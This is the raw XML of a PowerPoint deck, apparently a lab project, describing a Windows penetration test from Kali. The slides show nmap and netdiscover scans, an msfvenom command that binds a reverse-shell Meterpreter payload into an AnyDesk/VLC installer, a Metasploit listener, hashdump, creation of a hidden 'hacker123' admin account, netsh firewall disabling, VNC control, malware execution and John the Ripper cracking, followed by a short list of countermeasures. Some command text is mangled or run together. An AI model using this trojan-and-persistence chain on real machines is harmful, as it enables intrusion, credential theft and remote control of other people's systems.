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4630400" cy="8229600"/>
  <p:notesSz cx="8229600" cy="146304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E94709-735C-4D3D-A05E-F1F66F871BC9}">
          <p14:sldIdLst>
            <p14:sldId id="266"/>
            <p14:sldId id="267"/>
          </p14:sldIdLst>
        </p14:section>
        <p14:section name="Untitled Section" id="{7C120E2D-3AA7-4B99-830C-73FCEBB9EAB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39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ertificate with text and logos&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{E1ED74A6-356C-4AD2-5B5E-021A01C1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8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8303"/>
            <a:ext cx="104453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Malware Deployment &amp; Password Cracking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0724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Demonstrating further capabilities, we uploaded and executed a sample malware, then successfully cracked captured password hashes using John the Ripper.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150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Commands Executed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93790" y="4524494"/>
            <a:ext cx="6244709" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5317"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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782479" y="4524494"/>
            <a:ext cx="6267331" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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1009293" y="4694515"/>
            <a:ext cx="581370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upload malware.exe execute -f malware.exe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john hashes.txt           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9150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Attack Vectors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49615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Transferred and executed a simulated malicious program on the target.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30125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Utilized John the Ripper to crack collected password hashes, revealing plaintext credentials.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438B5D-D93C-3676-223C-FAEAFDBD99A2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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5925" y="578168"/>
            <a:ext cx="9183172" cy="656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Conclusion &amp; Essential Countermeasures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5925" y="1655683"/>
            <a:ext cx="13158549" cy="672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exercise successfully demonstrated a comprehensive Windows penetration, highlighting critical vulnerabilities and the methods to exploit them. More importantly, it underscores the necessity of proactive security measures.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35925" y="2564844"/>
            <a:ext cx="6500455" cy="630793"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 48003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455" y="2683073"/>
            <a:ext cx="315397" cy="39421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46190" y="3405902"/>
            <a:ext cx="2631400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Antivirus &amp; Monitoring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946190" y="3860602"/>
            <a:ext cx="6079927" cy="672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robust endpoint protection and continuous system monitoring.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7394019" y="2564844"/>
            <a:ext cx="6500455" cy="630793"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 48003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6549" y="2683073"/>
            <a:ext cx="315397" cy="39421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604284" y="3405902"/>
            <a:ext cx="2628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Strong Passwords</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="Text 7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604284" y="3860602"/>
            <a:ext cx="6079927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Enforce complex password policies and regular rotation.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="Shape 8"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735925" y="4901208"/>
            <a:ext cx="6500455" cy="630793"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 48003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455" y="5019437"/>
            <a:ext cx="315397" cy="39421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46190" y="5742265"/>
            <a:ext cx="2628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Regular Updates</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="Text 10"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="946190" y="6196965"/>
            <a:ext cx="6079927" cy="672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Keep OS and software patched to mitigate known vulnerabilities.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="Shape 11"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7394019" y="4901208"/>
            <a:ext cx="6500455" cy="630793"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 48003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6549" y="5019437"/>
            <a:ext cx="315397" cy="394216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04284" y="5742265"/>
            <a:ext cx="2628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Firewall &amp; Logs</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2050" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="Text 13"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7604284" y="6196965"/>
            <a:ext cx="6079927" cy="672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Maintain active firewalls and regularly review network logs for anomalies.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1650" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 14"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="735925" y="7316391"/>
            <a:ext cx="13158549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Recommended Safety Tools:</a:t>
            </a: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Windows Defender, Wireshark, Malwarebytes, GlassWire, NetLimiter.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="16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6F33BC-D268-E5CC-3632-3E143A4581DF}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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176824-7946-6969-3841-DD5C101D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146"/>
            <a:ext cx="14630400" cy="8273982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75077-BFF1-36B0-EA6D-B4599DBA7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37796C-75D6-BAA5-036C-0E9E7F85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FBD50A-DBB5-04FA-45B9-183C84E4C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659E1E-0E9F-DC4F-40A9-CFA17EDF7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217318" y="7059"/>
              <a:ext cx="3974283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4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Picture 4" descr="A person using a computer&#10;&#10;AI-generated content may be incorrect.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6776A8A5-88D6-0979-2AEC-7A2065E0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38"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="147259" y="138885"/>
            <a:ext cx="14326383" cy="79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563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Project Overview</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3" name="Shape 1"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="2204442"/>
            <a:ext cx="4196358" cy="2040493"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7170"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFC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793790" y="2173962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2551688" y="186428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61" y="2034421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27714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Identify Weak Points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51084" y="3261836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Pinpointing vulnerabilities in the Windows OS.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2204442"/>
            <a:ext cx="4196358" cy="2040493"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7170"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFC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7"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="5216962" y="2173962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6974860" y="186428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33" y="2034421"/>
            <a:ext cx="272177" cy="340162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474256" y="27714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Assess Security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5474256" y="3261836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Simulating attacks to test system resilience.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640133" y="2204442"/>
            <a:ext cx="4196358" cy="2040493"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 7170"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="FFFC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2"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9640133" y="2173962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3"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="11398032" y="186428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105" y="2034421"/>
            <a:ext cx="272177" cy="340162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9897427" y="27714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Propose Protections</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="20" name="Text 15"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="9897427" y="3261836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Recommending solutions against cyber threats.</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="Text 16"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="45850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Key Tools Used</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2200" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="Text 17"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="548366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Operating Systems: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Kali Linux (Attacker), Windows 10/11 (Target)</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="Text 18"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="6288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Scanning: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Nmap, Netdiscover</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Text 19"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="793790" y="673096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Exploitation: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Metasploit, msfvenom</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="Text 20"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="54836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Password Cracking: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John the Ripper</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="Text 21"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="592586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Network Analysis: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Wireshark</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="Text 22"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7599521" y="636805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Remote Access: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njRAT, VNC Viewer</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="17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1688B-669D-1902-5278-21346994A280}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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8303"/>
            <a:ext cx="75739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Footprinting &amp; Initial Scanning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0724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initial phase involved discovering active devices and open ports on the network. This reconnaissance is crucial for identifying potential entry points.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150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Commands Executed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93790" y="4524494"/>
            <a:ext cx="6244709" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5317"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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782479" y="4524494"/>
            <a:ext cx="6267331" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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1009293" y="4694515"/>
            <a:ext cx="581370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ip</a:t>
            </a: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a</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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netdiscover</a:t>
            </a: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-r 192.168.1.0/24</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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nmap</a:t>
            </a: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-A -T4 192.168.1.100           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9150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Process Summary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49615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Identified attacker's IP address.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93835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Discovered live devices on the local network.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3805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Scanned the target for open ports and services.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1D73D5-C9C3-E701-D8E7-C4F8F9B93DDD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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8303"/>
            <a:ext cx="105301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Target Identification &amp; Firewall Assessment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0724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Further network exploration confirmed the target's presence and initiated a comprehensive port scan to bypass potential firewall limitations.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150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Commands Executed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93790" y="4524494"/>
            <a:ext cx="6244709" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 5317"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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137710" y="4524494"/>
            <a:ext cx="6267331" cy="1791652"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1899"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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1009293" y="4694515"/>
            <a:ext cx="581370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nmap -</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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sn</a:t>
            </a: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192.168.1.0/24</a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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arp</a:t>
            </a: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–a </a:t>
            </a:r>
            <a:b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</a:br>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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nmap</a:t>
            </a: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-p 1-65535 -T4 -A -v 192.168.1.100           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9150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Actions Performed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49615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Verified active network hosts.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93835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Listed all connected devices via ARP cache.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38055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Executed an exhaustive port scan to reveal all listening services on the target.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67566-996F-A2B7-7815-1D7C09838F3E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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249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Crafting the Backdoor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8143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crucial step involved creating a malicious executable designed to grant unauthorized access, disguised within a legitimate application.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892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Commands Executed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93790" y="3798689"/>
            <a:ext cx="6244709" cy="3243263"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2937"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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782479" y="3798689"/>
            <a:ext cx="6267331" cy="3243263"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1049"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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1009293" y="3968710"/>
            <a:ext cx="5813703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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.101 LPORT=4444 –x /home/kali/Downloads/Anydesk.exe –k –e x86/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2000" dirty="0" err="1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shikata_na_gai</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="200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–I 10 –f exe –o /var/html/anydesk.exe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599521" y="31892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Payload Generation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77035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Generated a standalone Meterpreter payload (</a:t>
            </a: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Open Sans" pitchFamily="34" charset="-122"/>
                <a:cs typeface="Open Sans" pitchFamily="34" charset="-120"/>
              </a:rPr>
              <a:t>Anydesk</a:t>
            </a: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.exe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57545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Injected the payload into a legitimate VLC installer to create a stealthy, binded executable (</a:t>
            </a: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bindedvlc.exe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77AB7A-A914-20D5-2982-1D9E0C38C4E5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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1394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Gaining Remote Access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6288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the backdoor deployed, setting up a listener allowed us to establish a remote Meterpreter session upon victim execution, granting initial system access.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706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Commands Executed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93790" y="3980140"/>
            <a:ext cx="6244709" cy="2880360"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3307"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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782479" y="3980140"/>
            <a:ext cx="6267331" cy="2880360"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1181"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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1009293" y="4150162"/>
            <a:ext cx="5813703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msfconsoleuse exploit/multi/handler</a:t>
            </a:r>
            <a:b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</a:b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set PAYLOAD windows/meterpreter/</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="1750" dirty="0" err="1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reverse_tcpset</a:t>
            </a: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b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</a:b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LHOST 192.168.1.101 </a:t>
            </a:r>
            <a:b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</a:b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set LPORT 4444</a:t>
            </a:r>
            <a:b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</a:b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exploit           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3706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Exploitation Process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9518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Configured a multi/handler listener in Metasploit.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3940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Set the payload to match the generated backdoor.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83620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Initiated the listener, awaiting connection from the compromised system.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FB6195-F875-6C38-497C-7D29414A7860}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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56830" y="940951"/>
            <a:ext cx="1157978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Post-Exploitation: Information Gathering &amp; Persistence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2256830" y="2698671"/>
            <a:ext cx="1157978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Once inside, we gathered critical system information, extracted credentials, and established persistence by creating a new administrative user.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2256830" y="39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Commands Executed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2256830" y="4515922"/>
            <a:ext cx="5513189" cy="2517458"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 3784"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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2245519" y="4515922"/>
            <a:ext cx="5535811" cy="2517458"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 1352"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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2472333" y="4685943"/>
            <a:ext cx="508218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Sysinfo</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="443728"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F2EFED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Getuid</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="1750" dirty="0">
              <a:solidFill>
                <a:srgbClr val="443728"/>
              </a:solidFill>
              <a:highlight>
                <a:srgbClr val="F2EFED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hashdumpnet</a:t>
            </a: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user hacker123 Password123 /addnet localgroup administrators hacker123 /add            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8331041" y="39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Key Actions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8331041" y="4487585"/>
            <a:ext cx="5513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Retrieved detailed system information and current user privileges.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8331041" y="5292685"/>
            <a:ext cx="5513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Dumped NTLM password hashes for offline cracking.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8331041" y="6097786"/>
            <a:ext cx="5513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Created a new, privileged administrator account for persistent access.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66FAC6-B47D-9DC0-E9AD-D32801335B2F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="504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9754"/>
            <a:ext cx="83867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Firewall Evasion &amp; Remote Control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8869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expand our control, we disabled the host firewall and enabled VNC for visual remote desktop access, simulating typical post-exploitation activities.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964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Commands Executed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93790" y="4705945"/>
            <a:ext cx="6244709" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 6668"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EF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782479" y="4705945"/>
            <a:ext cx="6267331" cy="1428750"/>
          </a:xfrm>
          <a:prstGeom prst="roundRect">
            <a:avLst>
              <a:gd name="adj" fmla="val 2381"/>
            </a:avLst>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="F2EFE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1009293" y="4875967"/>
            <a:ext cx="581370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netsh advfirewall set allprofiles state off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highlight>
                  <a:srgbClr val="F2EF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run vnc           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0964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Impact &amp; Control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67760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Disabled all Windows Firewall profiles, removing a key security layer.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48270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Enabled VNC server, allowing full graphical remote control of the compromised system.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4D142-117E-63DE-81D9-3826691E78F1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="7725508"/>
            <a:ext cx="14630400" cy="5040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733</Words>
  <Application>Microsoft Office PowerPoint</Application>
  <PresentationFormat>Custom</PresentationFormat>
  <Paragraphs>91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Consolas</vt:lpstr>
      <vt:lpstr>Crimson Pro Bold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adarsh singh</cp:lastModifiedBy>
  <cp:revision>4</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2025-07-30T05:25:31Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2025-07-30T06:12:43Z</dcterms:modified>
</cp:coreProperties>
</file>